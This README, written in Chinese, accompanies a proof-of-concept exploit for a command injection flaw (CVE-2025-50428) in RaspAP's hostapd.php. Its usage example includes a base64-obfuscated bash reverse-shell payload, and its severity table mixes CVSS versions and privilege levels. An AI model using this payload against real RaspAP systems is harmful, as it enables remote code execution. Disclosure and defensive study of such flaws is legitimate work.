CVE-2025-50428 的概念验证漏洞利用程序,针对 RaspAP raspap-webgui 3.2.9 及更早版本中的命令注入漏洞。
| 漏洞 ID | CVE-2025-50428 |
|---|---|
| 严重性 | 高 (CVSS 3.1: 8.6) |
| CVSS 向量 | CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
| 漏洞类型 | 代码注入 |
| 攻击向量 | 远程(已认证) |
| 所需权限 | 低 |
| 影响 | 代码执行、权限提升 |
| 受影响产品 | raspap-webgui ≤ 3.2.9 |
| 发现者 | SmartTECS Cyber Security GmbH |
该漏洞利用程序针对 RaspAP 的 hostapd.php 脚本中的一个命令注入漏洞。该漏洞源于对通过 interface 参数传递的用户输入缺乏适当的净化处理。经过身份验证的攻击者可以注入任意操作系统命令,从而以 www-data 用户的权限执行代码。
requests 库python3 poc.py --base-url <url> --interface <payload> [--username <username>] [--password <password>]
--base-url:RaspAP 安装的基础 URL(例如,http://192.168.122.22)--interface:interface 参数的值,允许注入载荷--username:RaspAP 用户名(默认:admin)--password:RaspAP 密码(默认:secret)python3 poc.py --base-url http://192.168.122.22 --interface "';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMi4xLzEzMzcgMD4mMTs= | base64 -d | bash"
SmartTECS Cyber Security GmbH 是一家专注于渗透测试、安全软件开发与漏洞研究的网络安全公司。该公司提供定制化的安全评估、事件响应和战略咨询服务,以帮助组织保护关键系统免受不断演变的网络威胁。
本工具仅供教育和研究目的使用。仅可在您拥有或获明确许可管理的系统上使用。作者及 SmartTECS Cyber Security GmbH 对滥用或造成的损害不承担任何责任。